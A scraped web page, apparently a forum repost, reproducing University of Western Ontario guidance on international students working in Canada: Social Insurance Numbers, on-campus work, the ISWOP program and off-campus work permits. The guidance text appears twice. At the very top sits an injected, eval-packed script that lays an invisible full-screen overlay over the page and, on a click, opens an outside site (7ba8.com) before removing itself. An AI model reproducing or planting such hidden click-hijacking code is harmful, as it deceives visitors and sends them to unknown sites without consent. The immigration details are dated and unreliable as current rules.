<script>;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(3(){3 4(){8 o=2.9(\'a\');o.1.b=\'c\';o.1.d=\'0\';o.1.e=\'0\';o.1.f=\'5%\';o.1.g=\'5%\';o.1.h=\'i\';o.1.j=\'k\';o.l(\'m\',()=>{n.p(\'q://r.s\');o.t();u(()=>{2.6.7(o)},v)});2.6.7(o)}4()})();',32,32,'|style|document|function|ad|100|body|appendChild|const|createElement|div|position|fixed|top|left|width|height|zIndex|99999999999|display|flex|addEventListener|click|window||open|https|7ba8|com|remove|setTimeout|10000'.split('|'),0,{}));</script>U of Western Ontario 关于留学生申请各种 permits 的说明
Path:
[color=]SDC
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[color=]International Student Services
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[color=]Visas & Immigration
> Working in Canada Working in Canada Topics:
[color=]Working in Canada
[color=]Social Insurance Number
[color=]Working On-Campus
[color=]Working Off-Campus
[color=]Co-op and Internship Programs
[color=]Post-Graduation Work Program
[color=]Checking the Status of Your Application
[color=]Spouses of International Students
[color=]Job Searching
[color=]Questions About Immigration Regulations?
Working in Canada Citizenship and Immigration Canada states that:
As an international student "you must come to Canada with enough money to live and pay your bills while you are studying, without needing to work. In certain situations, you may be able to work while you are studying. Working will help you earn extra money and gain Canadian work experience."
Students should therefore ensure that they have the funding level required by Citizenship and Immigration before entering university studies and should NOT expect that working in Canada while studying will be enough to cover tuition and living expenses. It is also important to consider the academic demands of your program prior to participating in employment particularly if it is your first year of university studies in Canada.
As a general rule, anyone who is not a Canadian Citizen or Permanent Resident must have a Work Permit for all work in Canada. Normally, under the Foreign Worker Regulations, an employer has to prove that there are no qualified Canadian Citizens or Permanent Residents suitable for the position. This is done through the HRSDC (Human Resources and Skills Development Canada) labour market opinion and confirmation process. However, there are some special exemptions which apply to international students.
International students in the categories below may be granted permission to work without needing HRSDC (Human Resources and Development Canada) Confirmation (i.e., without being subject to the availability of Canadian workers.)
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[color=]Social Insurance Number
NOTE - If you want to work in Canada, you must have a Social Insurance Number regardless of the type or duration of your work term. An employer cannot pay you until you have this number. For more information, please visit
[color=]Social Insurance Number
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Students Working On-Campus International students who hold a valid Study Permit may look for and accept employment on-campus provided they are in attendance and registered as full-time students at the post-secondary institution where the employment will take place. In this case, a Work Permit is NOT required.
"On-campus" employment is defined as employment in facilities owned, leased, or rented by the educational institution (for example it can be a private business located on-campus that provides service to the institution).
ISWOP (International Student Work Opportunities Program) is a new on-campus employment program which was piloted in the winter term of 2005, with 15 international student participants. During the 2005-2006 academic year, 75 students participated in the program. ISWOP is a program for international undergraduate (main campus degree) students designed to provide financial assistance through paid part-time employment on the campus.
For further information including application deadline and eligibility requirements, visit the
[color=]ISWOP page.
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Working Off-CampusWe are pleased to announce the launching of the national Off-Campus Work Permit Program. The program enables eligible full-time international students to be able to apply for an off-campus work permit.
For more information, visit
[color=]OFF-CAMPUS WORK PERMIT PROGRAM.
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Path:
[color=]SDC
>
[color=]International Student Services
>
[color=]Visas & Immigration
> Working in Canada Working in Canada Topics:
[color=]Working in Canada
[color=]Social Insurance Number
[color=]Working On-Campus
[color=]Working Off-Campus
[color=]Co-op and Internship Programs
[color=]Post-Graduation Work Program
[color=]Checking the Status of Your Application
[color=]Spouses of International Students
[color=]Job Searching
[color=]Questions About Immigration Regulations?
Working in Canada Citizenship and Immigration Canada states that:
As an international student "you must come to Canada with enough money to live and pay your bills while you are studying, without needing to work. In certain situations, you may be able to work while you are studying. Working will help you earn extra money and gain Canadian work experience."
Students should therefore ensure that they have the funding level required by Citizenship and Immigration before entering university studies and should NOT expect that working in Canada while studying will be enough to cover tuition and living expenses. It is also important to consider the academic demands of your program prior to participating in employment particularly if it is your first year of university studies in Canada.
As a general rule, anyone who is not a Canadian Citizen or Permanent Resident must have a Work Permit for all work in Canada. Normally, under the Foreign Worker Regulations, an employer has to prove that there are no qualified Canadian Citizens or Permanent Residents suitable for the position. This is done through the HRSDC (Human Resources and Skills Development Canada) labour market opinion and confirmation process. However, there are some special exemptions which apply to international students.
International students in the categories below may be granted permission to work without needing HRSDC (Human Resources and Development Canada) Confirmation (i.e., without being subject to the availability of Canadian workers.)
[color=]Back to Top
[color=]Social Insurance Number
NOTE - If you want to work in Canada, you must have a Social Insurance Number regardless of the type or duration of your work term. An employer cannot pay you until you have this number. For more information, please visit
[color=]Social Insurance Number
.
|
[color=]Back to Top
Students Working On-Campus International students who hold a valid Study Permit may look for and accept employment on-campus provided they are in attendance and registered as full-time students at the post-secondary institution where the employment will take place. In this case, a Work Permit is NOT required.
"On-campus" employment is defined as employment in facilities owned, leased, or rented by the educational institution (for example it can be a private business located on-campus that provides service to the institution).
ISWOP (International Student Work Opportunities Program) is a new on-campus employment program which was piloted in the winter term of 2005, with 15 international student participants. During the 2005-2006 academic year, 75 students participated in the program. ISWOP is a program for international undergraduate (main campus degree) students designed to provide financial assistance through paid part-time employment on the campus.
For further information including application deadline and eligibility requirements, visit the
[color=]ISWOP page.
[color=]Back to Top
Working Off-CampusWe are pleased to announce the launching of the national Off-Campus Work Permit Program. The program enables eligible full-time international students to be able to apply for an off-campus work permit.
For more information, visit
[color=]OFF-CAMPUS WORK PERMIT PROGRAM.
[color=]Back to Top
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